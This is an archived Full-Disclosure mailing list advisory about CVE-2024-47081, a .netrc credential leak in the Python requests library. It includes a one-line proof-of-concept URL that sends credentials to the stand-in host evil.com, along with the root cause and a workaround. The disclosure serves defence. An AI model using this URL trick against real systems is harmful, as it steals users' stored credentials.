| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <vXnhIIDfNauWIt5MizRQzyPhX--T3oCrKfPV4ixDc2J1W9iwF3zUR7g-9q1zz966EbG6Nf3Q5EX37ezTHJR_HgHXshROjRfXLDWl1AEInXA=@protonmail.ch>
Date: Sat, 31 May 2025 06:30:50 +0000
From: Juho Forsén via Fulldisclosure
<fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] CVE-2024-47081: Netrc credential leak in PSF requests library
The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions.
Issuing the following API call triggers the vulnerability:
requests.get('http://example.com:@evil.com/')
Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.
The root cause is https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245
The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available. CVE-2024-47081 has been reserved by GitHub for this issue.
As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists